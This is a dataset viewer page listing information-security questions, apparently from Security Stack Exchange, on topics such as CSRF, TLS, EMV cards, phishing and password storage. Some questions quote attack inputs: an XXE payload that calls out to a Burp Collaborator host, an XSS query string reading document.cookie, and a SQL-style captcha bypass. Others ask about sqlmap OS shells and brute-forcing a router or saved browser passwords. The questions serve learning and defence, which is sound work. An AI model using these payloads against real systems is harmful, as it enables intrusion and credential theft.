instruction stringlengths 24 29.9k |
|---|
To implement some automatic rules that run scripts in Outlook, you now (following the KB3191883 update in 2017) have to set the EnableUnsafeClientMailRules in the registry.
A lot of online tutorials mention to do this, but do not describe the impact.
How unsafe is it?
|
I'm seeing token scopes as more of a contract between what a third-party application can do on behalf of some user's consent.
Therefore, let's say a client asks a Resource owner to authenticate and includes scopes telling the user it's only going to be able to read their data.
Surely the client can just go ahead and re... |
How can the CSRF happen if browsers do not allow cross-origin requests by default?
Here is a brief CSRF overview, which is relevant for the question. CSRF (i.e. cross-site request forgery) is a type of attack. For the attack to happen, the following points should apply:
Back-end (BE) app should use cookies for authent... |
This tutorial shows how to find a JMP ESP in nttdll.dll
http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/
Find address for EIP
In this step we have to check the registers and the stack. We have to
find a way to jump to our buffer to execute our code. ESP points to
the beginning of the C part of ... |
I'm using openssl for a project and came across two options: -k passphrase and -K raw_key (hex). What's the difference between the two options? I've been attempting to port something from openssl to Python, and the openssl command I'm using for my basis uses -k [32-bytes_of_hex_data], which yields an entirely different... |
I'm not a crypto/security expert and have designed an architecture for encryption/decryption. I'm not sure if its full proof and want to know what people use as industry standard?
I'm trying to perform encryption/decryption in RESTful api where client sends encrypted payload and server decrypts it and does some process... |
I run a website that allows people to create accounts with an email address address and a password. Over the last month, I have had about 100 accounts created with email addresses that look like this:
pa.rk.i.n.g.x.pe.rtdon.ma.na.h.a.n.@gmail.com (always with lots of dots)
and the provided name is one of
Robertskala
... |
Assume that someone gains access to the password used for my key store containing my server certificate and it’s private key.
I guess without direct access to the server running my application the actual private key cannot be extracted?
So as long as no one can ssh or similar to the machine containing the keystore with... |
I'm learning about certificates, and would like to understand:
How is it possible for intermediate certificates to not include a CA Issuers part?
Is it not a must so that clients can figure it the Chain of Trust?
I'd like to give here 2 examples:
One whose intermediate certificate includes a CA Issuers (*.stackexchange... |
I have an ASUS laptop with Windows 10 that I want to factory reset. I used it for many years and did some torrenting with it in the past, so I wouldn't be surprised if something went wrong when it comes to security. The steps I would follow are these: https://www.asus.com/en/support/FAQ/1013065/
I would rather factory ... |
I found an SD card at airport security. It's a higher-end card and 64GB. I'm guessing that it's probably from someone's camera and likely has photos on it that they would like returned. Is there a safe way form me to view the contents with the goal of possibly returning it to the owner?
|
There are URLs which its only purpose is to redirect the HTTP requestor to a correct website. Say, if I tried to access example.com/0wa/RaNd0m from my computer, it would redirect me to wikipedia.com. But if I tried it from my Virtual Machine in AWS, it would redirect me to a malicious site. Why is the final web page di... |
For platform hardware independence, a proposal to host a SFTP server within a containerized environment was being considered.
A container or pod would have the server running within it, with mounted host directories for file related operations.
I am not certain how secure this proposal could be, both from SSH and docke... |
I am trying to disable ciphers using jdk.tls.disabledAlgorithms.
I have created a properties file named disabledAlgorithms.properties and it is has jdk.tls.disabledAlgorithms=AES_128_CBC,SHA1,SHA256.
I am passing this property file as
java -Djava.security.properties=disabledAlgorithms.properties
Here I have used SHA1 t... |
I had a discussion with a friend today about his password hash comparison. I argued that you can't return false on the first hash mismatch you have and I sent him a link to an article about a Java timing attack that happened in Java 6.
public static boolean isEqual(byte digesta[], byte digestb[]) {
for (int i = 0; ... |
The situation: Currently, we are sending out emails and SMS to our users, which include a link to a form that each user has to fill out on a regular basis (an "eDiary"). As we need to be able to authenticate and authorize the user accordingly, we currently attach a jwt token as a query parameter to the link as we want ... |
SCENARIO:
I successfully tried to send a request to the burp collaborator, then the application is vulnerable to SSRF through blind XXE. The payload I used is the following
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "http://{burp_url}.burpcollaborator.net"> ]>
<xxx>&xxe;</xxx>
If I u... |
I've been seeing a large number of companies, including Cloudflare who just sent out a notice to their customers about enabling HTTP/3 via QUIC recently, touting HTTP/3 based on QUIC as 'much better' than the older HTTP protocols.
I understand the underlying improvements QUIC and HTTP/3 will introduce - bandwidth handl... |
For example, can you reference a customer by their domain in an email?
Each customer in a system can be associated with a domain, and some domains are associated with a single customer.
|
Feel free to correct my below logic.
As far as I can tell, HF RFID tags (specifically I've tested MiFare Classic 1kb) have a 48-bit encryption key (default to 0xFFFFFFFFFFFF or something) to protect their contents. A quick Arduino RFID reader I connected together showed me that indeed the blank cards I had purchased co... |
I am currently trying to establish a VPN connection from my Windows 10 Enterprise 1909 to a remote VPN gateway, using the built-in Windows VPN / IPSec client. Since the UI does not provide all options I need, I have created and fine-tuned the VPN connection with Powershell (using an account with Administrator rights):
... |
I have recently started getting the occasional spam mail after not having this problem for several years. As far as I know spammers typically obtain mail addresses via data breaches or by crawling the web for mail addresses carelessly made public via forum posts etc. I don't think the former applies to me so I was wond... |
My Mother received an e-mail, from some unknown mail adress. The content of the mail, was:
"Hello you should look at this: ... " After this there was an old email correspondence with her lawyer, not really sensitive data, but still. There was a .zip file attached, the file name beeing some long number. She didn't try t... |
At CERN the WiFi used, is not using any encryption. This means that it is a plain, standard Wi-Fi network with no authentication.
However, it is mandatory to register each device when first connecting to this internal network, for security purposes. Obviously, the device model, name of the owner, MAC address and the MA... |
I'm having a webservice which I'm using for my app. The webservice is using cookies when authenticated. I want to give my users the option to login via TouchID for faster login. Therefore I'm storing the users username and password in the iOS keychain and release it when the finger is accepted and it is also necessary ... |
I would like to design a REST API endpoint (POST) that takes in some sensitive identifier information in the request body:
{
"someDataToSearch": "abcdefgh"
}
I then want to hash abcdefgh and search for that hash in our DB and return the corresponding entity, which will have been generated and stored in the DB prior... |
I have been using pgp for years now, but usually email the person my public key and compare its fingerprint over the phone or give it to them in person on a stick. I thought I might try out the key servers a while ago and uploaded a public key with:
gpg --send-keys --keyserver keyserver.ubuntu.com C3582062D32255323DEAB... |
I am looking for a modern, password manager-based way to share my passwords with certain parties (partner, executor of my will) within a week or so of my death, but no sooner.
The scenario I wish to avoid is the loss of my assets and/or breach of my privacy during my lifetime. My threat model includes betrayal of trust... |
I have a server, which receives text mails from students and I plan to automatically collect their message bodys and parse them as markdown so that I can generate a nicely formatted output as pdf. Is there anything I need to be cautious of if I automatically do this parsing? Is there anything I need to intercept to avo... |
The newly released computer game Genshin Impact must be run as administrator on Windows 10. Millions of people have downloaded this game. It runs on multiple platforms, however I assume that a signification proportion of the downloads are being run on Windows 10 as administrator. There is almost no reference to the req... |
I have a package to be shared to Bob which contains:
an encrypted data.zip
Application, which will have logic to decrypt the data
Bob will run Application and it will decrypt the data.zip.
Now for the decryption key. I understand that I can maintain a key store where I can keep the key securely which my Application w... |
Typically, HTTPS redirection happens like this:
The user clicks or types an HTTP link, e.g. http://example.com/url.
If the browser has seen a Permanent (301) redirect to HTTPS for that exact URL, it follows it, skipping steps 4 and 5.
The browser does a DNS lookup for example.com (if not already cached).
The browser c... |
As part of auditing, I have to find whether an Excel file is modified by anyone after it was created in 2018 by the original user on a Windows 7 computer.
I had verified the creation, modified and accessed info available in file. All this info are of 2018 and believing these timestamps, I submitted a report that the fi... |
While I'm trying to do a bruteforce attack on my router using routersploit.
Im getting the error
rsf (HTTP Basic/Digest Bruteforce) > run
[*] Running module creds/generic/http_basic_digest_bruteforce...
[-] Resource / is not protected by Basic/Digest Auth
I'm able to understand that the path may be the problem here.
r... |
Google-fu is failing me, and I could not find documentation that answers the following question: if an application uses Windows machine key or user key to encrypt certain data, and the encrypted data is still available, but machine becomes inoperable (hard drive failure, erroneously formatted drive, etc.), how can keys... |
I have a web application talking to a PostgreSQL database.
My threat model is the following:
Attacks must not occur at rest. What i'm afraid of is unwanted deletion of data on a specific table, let's call it the data table.
What i mean by "unwanted deletion" is deletion of rows inside the data table that would not be d... |
This blog post from 2016 shockingly implies that gmail will accept an email if either SPF or DKIM passes. We use G suite SMTP servers, therefore SPF provides almost zero protection from spoofing. Is this still the case?
Since DMARC only needs one policy to succeed, would implementing DMARC with SPF+DKIM guarantee the ... |
I have written the following rule in my Suricata rules file:
alert tcp any any <> any any (flow:established; content:"|65|"; offset:0; depth:1; byte_test:1, =, 3, 2, bitmask 0x03; msg:"detected"; classtype:bad-unknown; sid:222; rev:1; priority:1;)
But it shows the following error because of the bitmask:
...
[ERRCODE: ... |
I make email client over IMAP protocol. To "remember" user's connection details (email, password, host, etc.) I need to store password in plain text, because otherwise I won't be able to open connection again.
Is there is a way to open IMAP connection usinng hashed password? Any other solutions are welcome.
|
I'd like to know if it's possible to protect communications between a heavy client on a machine and a remote server accessible by a web interface on this machine using certificates. Or the only way is to set a certificate for the whole client machine ?
Thank you for your help.
|
I am attempting to build an application that submits numerous fetch/XHR requests to a NodeJS backend. I'd like to implement CSRF token protection, but would like to avoid implementing server-side rendering/templating or middleware on the frontend (trying to go as vanilla JS as possible on frontend). This means I can't ... |
Although openssh is awesome, I'm interested in exploring some more lightweight FLOSS alternatives to use for connecting to servers I'm administrating (and using alone). Since I only need a minimal set of features (only public-private-key authentication, only a single (secure) algorithm like ed25519) and I'm aware that... |
I am required to login to the university VPN when I am off-campus, in order to connect to a server to submit assignments for a specific class. Is the university able to see what I am doing while I am connected to the VPN? It is called cisco anyconnect secure mobility client.
|
Say I have a "Login Data" Chrome file that is encrypted with the user's Windows password. Is there a way I can brute-force the file and try to decrypt it using every password possible?
|
I'm creating (what I believe to be) a cryptographically hard to guess session key to keep my users logged in by generating 32 random bytes (using crypto.randomBytes). I'm storing this in a cookie (as hex). The website will be using TLS.
The cookie library I'm using offers an option to sign the cookie with hmac sha256, ... |
Trying some malicious injection against bWAPP and came across bypass captcha
Filter validating captcha is
if($_POST["captcha_user"] == $_SESSION["captcha"])
Tried input 1' || '2 but it doesn't bypass logical condition.
|
I'm trying to set up a multi factor authentication using PKIs certificates.
A PKI infrastructure is ready to use and i'm planning to put these certificates on smart cards.
I was looking for a smart card reader and I came across this one :
https://www.amazon.ca/-/fr/Gemalto-Idbridge-CT30-USB-lecteur-carte/dp/B00G46Y7CG?... |
I am testing web application firewall and I have installed ModSecurity 2.9 runs Core ModSecurity Rule Set ver.2.2.9 and to test on Web application I also install DVWA Platform: Windows
and trying to do Command Inject and it allows even if I included rules for command inject
modsecurity_crs_40_generic_attacks.conf
... |
I was looking around to see if wedge attacks on EMV cards are still viable or a solution has been implemented, and if so, have attackers found another way around the solution?
The latest literature or post I can find goes back to 2010-2012.
|
The title really says it all. I'm starting to dig a little bit into computer security and from what I've watched or from what I have read in books or articles there's always a mention of basic smart cards (e.g. Chapter 3, “Scenarios for Using TPM 1.2” from “A Practical Guide to TPM 2.0”).
I understand TPM is a chip wit... |
I have found multiple sources telling me otherwise, but most are outdated by a year or two. If I am logged into my G-suite managed account on google, and search something up on a home network and personal device, can my school still see my browsing history? If it makes a difference, in Web and App Activity the option f... |
How could an app that is malware be on the Google Play store? I found a Bible app "Bible Home" (which exhibits malware like behavior) available for Android on the Play Store. However, after installing it, I didn't see the app. My phone soon asked me if I wanted to use Launcher3 or this new app to be my app launcher -... |
I was wondering... if antiviruses store virus definition files that contain virus signatures then why wouldn't they get detected as malware by themselves or Windows Defender or any other AV out there?
|
I'm trying to understand EAP-TLS authentication, but I'm struggling to understand a few bits:
Before the supplicant sends any certificates to the server, it usually verifies the server's identity.
After it does, how can it ensure that it's talking to the correct server for further communication, does it establish a t... |
I recently received an email message with the subject "San Diego Site Leadership and Management Team sent you an Amazon Gift Card!", sent to my work address, apparently from "Amazon.com Gift Cards <gc-orders@gc.email.amazon.com>".
I was suspicious because there was no mention of my employer's name, just a generic messa... |
We are in the process of porting our servers from one cloud provider to another. Our SSL certificate is also about to expire. If I generate a new SSL certificate and put it on the new servers, will the about-to-expire certificate continue to work on the old servers? Yes, is my guess. Just wanted expert opinion.
|
While creating an Android App that uses an API, the most difficult problem to solve is API security.
Creating a token and securing it in KeyStores is one thing. But what about a guest user?
A guest user requires a Token, and acquiring that Token from the API is not secure, as this API should not require any signing cre... |
I was using a dating app, and this person sent a link. When I clicked on it, it led me to Google Maps and I exited immediately, without seeing which location it was showing.
I'm scared the person now knows my home address/ip address or some other personal info. I don't know whether the guy was sharing his location, or ... |
In order to design and develop a secure system it is important to formulate a threat/adversary/trust/security model for the corresponding system to be able to evaluate the proposed system and help others to know if it is suitable in their prospect applications or not.
First, I am a bit confused about the difference... |
In order to better protect my Django web app, I want to reduce the leakage of information that could help an attacker profile my application. If you were an attacker, what would you look at to identify a Django web app?
From OWASP, I know that this kind of probing...
typically examines HTTP header names and values, se... |
On Android it is possible to add native libraries provided by the system (/system/lib/) or the vendor (/vendor/lib/) to a system app. For example, the libandroid_runtime.so is loaded with System.load("/system/lib/libandroid_runtime.so"). How are these libraries protected against tampering? Are all libraries signed and ... |
Suppose a mischievous coffeeshop wifi gateway wants to drain phone batteries.
It is easy to see how it might weaken signals and flip a few bits to wreak NAK havoc at the link level
so wifi chip power consumption is maximal.
But, how could it waste power on the main CPU chip?
With phone wifi speeds now exceeding 1 Gbps,... |
I know encrypting something with my private key is used for signing. To prove that the message is indeed coming from me.
But what about if I sign something with my public key? That would mean that only I could decrypt it with my private key.
Suppose I did this and I sent over my ciphertext (encrypted with my public key... |
At my Company, we put a honeypot in our network and it raised us the Lansweeper SSH password used to connect to the scanned assets (and it is reusable over many boxes...).
So it is a way for an attacker to get sensitive passwords in a corporate network.
I was like "Does SSH not use challenge-response?". Then I thought ... |
I understand that XSS attacks can access all globals (like cookies, storage, etc) within the context of the running javascript code, but I would like to understand if they could also have access to any in memory variables as well?
For example, there are some suggestions to keep the JWT in memory (and refresh it silentl... |
This is obviously not from PayPal, but the font in the word account displayed using odd looking font, is this a security risk to me that Outlook.com displayed this font? See below, Outlook has preview text enabled as default
|
Issue:
Oftentimes people enter google.com directly in the browser's address bar without including either the http:// or https:// prefixes.
Using Chrome DevTools on a fresh incognito session, I ran the following experiment:
STEPS:
-----------------
Enter "google.com" (or equivalently "http://google.com") directly in t... |
So, I know how public-private key encryption works. I understand how/why certificates are required. I understand how a SSO flow (IdP initiated) works. But, I do not understand how the three of them happen together. I am confused about what "signing" a SAML assertion means. I'm confused about "encrypted certificates". I... |
In Immersive Labs lab "Password Hashes II"
What is the plaintext password of 'hash part 1' in the shadow file?
shadow.txt contains:
part1:$6$WJ9Y7LHr$S3SdnPsXhCzHetPz0CL6TL7gZdeVK/8DZjWvWuKss7gh8CR1VHkwbJyBufg19.4igURrZ6KkZ1rpErbmRnErl0:1001:1001::/home/part1:/bin/bash
part2:$6$OiSz6xnZ$ajXWPNxlLIKlxxoQJrOPnY/YvY7b2... |
I'm seeing over 1000 attempts to hit my API endpoints with many 500 responses. It seems clear that the would-be attacker is attempting to poke around the APIs, but it isn't clear to me what type of attack they're attempting. Hoping someone here can identify this.
Many of the requests include a random string in a handfu... |
I once heard that the author of the early NES emulator "Nesticle", clearly a very intelligent person, baffingly used some kind of exploitable "Samba" or "SMB" server running in his home with its source code (and probably other private files/data) on it.
The result was that somebody, somehow, managed to break into it an... |
I am exploring the AWS KMS as a vault for storing the encryption keys. Now I am trying to encrypt the database fields like email.
So, issue whenever there is a read/write for email, I don't want to hit the AWS APIs(using SDK) to encrypt/decrypt.
What I am thinking is that, is there a way I can get the plaintext data ke... |
Can this be exploited as XSS vulnerability using urls like localhost/?myVar=<script>alert(document.cookie)</script> or though any other possibility?
<c:set var="myVar" value="<%=request.getParameter(\"myVar\")%>"/>
<c:if test="${myVar == 'VALUE1'}">
<option value="a">A</option>
<option value="b">B</option>
</c:if... |
A company I work with has a number of mobile devices that are used primarily for testing apps and websites.
I have advised that to improve security it would be best for each device to be assigned to a specific staff member, and for this staff member to use their company email address to sign in to the device.
My reason... |
I came across this question Offline brute-forcing of a bank card PIN, which was asked 7 years ago. I'm currently exploring vulnerabilities in EMV protocol, and I wanted to double check if an idea I had in mind is viable.
I came across a paper written in 2013, titled Risks of Offline Verify PIN on Contactless Cards, whi... |
I am cross-posting this question from Serverfault, because I am in doubt where it fits best.
Say I have a server set up for processing sensitive data. The few authorised users of the system are instructed not to copy any of the sensitive data out of the platform, but could in principle do so using scp etc. This is simi... |
Tutorials I've come across about implementing magic link authentication (in Node) recommend a mechanism like this:
the user hits your endpoint with their email address
you generate a signed JWT from the email and the date using a constant key (if you are a bit more savvy, you use the asymmetric RS256 scheme instead of... |
Usually, in OSINT when it comes to IP addresses and geolocation the investigator attempts to get a rough location from a public IP address. However, I'm trying to find out more about reversing that process. Let's say in this scenario I know the location of the entity of interest, to about the city level. Obviously you ... |
Is it a bad idea to cache randomness in the general case? My feeling is yes, but I'm having a hard time articulating why.
Scenario:
A programming language of your choice (e.g. node) uses a native call to generate random bytes (e.g. for creating a uuid). It is very hard to predict the random bytes even with access to th... |
I'm curious about hashing, because normal hashing is static, it means that a string that gets hashed will always be the same (except for using salt). Because of that situation, there are many websites that are able to "crack" a hash by comparing it to hashes in its database.
So I'm curious how much longer regular hashi... |
I've received the following suspicious mail in my Gmail inbox, about my password being exposed:
As you can see, it comes from gaia.bounces.google.com and is signed by accounts.google.com. But there are two weird things about it:
It is written in Portuguese. I live in Spain (but near the border with Portugal, just in ... |
I'm looking into creating a CA certificate strategy where i work. And i was wondering if anyone had any points of interest to raise around the difference of a model where our .com and key subdomains use the same cert with SAN entries... versus each subdomain (microservices/apis of the same site) having its own cert? I'... |
I have a hardware security module connected to a host computer (Windows/Linux). The HSM contains symmetric keys used to encrypt/decrypt data (i.e. files and real-time communications); the keys are stored inside the memory of the HSM and their values are never exposed outside of the HSM.
The HSM exposes a login/logout A... |
In the EMV documentation (EMV Book 3 Section 6.5.10), the PIN Change/Unblock command provides the option to change or unblock a card's PIN, and also handles resetting the PIN Try Counter (EMV tag 0x9F17) along the way. This command is an issuer script, meaning it is sent by the issuing bank to an ATM or a POS which the... |
Using sqlmap I was able to gain access to one database and using --current-user and --privileges. I can confirm that the user is root@localhost with full privileges.
The part I have problem with is that I don't understand how the --os-shell works. I have googled a lot but all the tutorials are using easy targets which ... |
I'm running kali Linux on VirtualBox. I ran sudo ifconfig to get my IP and subnet mask (X.X.X.15 and 255.255.255.0 for eth0)
I tried the command nmap -oG X.X.X.0-255 -vv but I got
Read data files from: /usr/bin/../share/nmap
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up)... |
I read a comment on here that goes something like "trying to hide user authentication from an XSS attack is like reinforcing your fridge against a nuclear bomb; at that point, you've got much bigger problems to worry about, and nothing you reinforce your fridge with will be effective anyway".
Is this accurate?
|
I know someone can break open the case, but what about opening it without leaving evidence?
Are there any seals available for securing your laptop from unauthorized access?
And sealing the sides of the laptop with superglue
|
I'm trying to discover what cipher suites are being offered by my corporate proxy. It's set up as a man in the middle so my "secure" connections are to it, and it attempts to create a secure connection to my target.
Specifically, I'm looking to view the list of ciphers presented by the proxy in the ClientHello message... |
Numerous websites allow us to build and execute C code from web browsers (repl.it, onlinegdb.com, ideone.com...). For my own application (education purposes) I would like to do the same on my web backend.
My current solution is to use an Alpine Docker container with gcc constrained with ulimits. To avoid mounting files... |
Guests need to use Wi-Fi when they come by, so to minimize risk, I've simply kept a secondary secured router running for guests since it's not possible to understand anybody's computer & security habits with certainty.
The guest router is starting to go bad and the cost of new high performance routers are high. If I op... |
I know that there are many open source projects that focus on web scraping and automation testing. The prominent ones are Puppeteer and Selenium. But these projects are not recognized as bots in recaptcha-like bot detection mechanism - at least during my experiments. For instance, I used Puppeteer and recaptcha for thi... |
I imagine like either leaked or otherwise published official memos on efforts and signals intelligence programs to intercept and crack different types of communications either lamenting or chronicling the technical difficulties in doing so and resultant "blind spots". Or, for example, the spectacular national FBI/Apple... |
When Alice and Bob both have the same shared secret to encrypt their data (Diffie-Hellman) and Alice encrypts her data with this key and Bob can decrypt it with the same key, then Bob knows that the message comes from Alice.
So why is still HMAC needed?
|
I have learned that the certificate is something that contain information about a public key. An article on wikipedia says Public Key Certificate as well. If we are talking about private key, it's not a certificate, but a key that corresponds with the public key certificate.
On Microsoft Azure I have found this sentenc... |
I have run into this issue on my first website I pushed live.
I have a website that has been live for a couple of months. It had 30 people signed up over that period which as suddenly spiked up to 150+ in the last 3 days and counting. I've noticed every single one has a "real" sounding email address and then a random s... |
I am curious about why I can't duplicate the OpenSK key.
I have a few keys that I put the same certificate and private key on them but they are different.
I found it useful to have a duplicate key in case of hardware failure, breaking, losing, etc.
|
I'm trying to verify that a smartcard (possibly doctored by an attacker) has access to the (ECDSA P-384) private key for which I was given a (signed) public key, in order to verify that the card is genuine. In order to do that, I should pass a random nonce to the card, ask it to sign it, and verify the result against t... |
I am having trouble answering what seems like a simple question. I was hoping to find a Yep/Nope style list somewhere, but can't seem to find one.
What data should be encrypted in a cloud (e.g. AWS/Azure) database?
I have researched ICO as well as Stack Exchange Posts, but can't find a direct answer.
Obviously password... |
I saw VLC (Windows) gets updates from an unencrypted URL: HTTP, not HTTPS!
Do you think there's a risk for a man-in-the-middle attack?
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.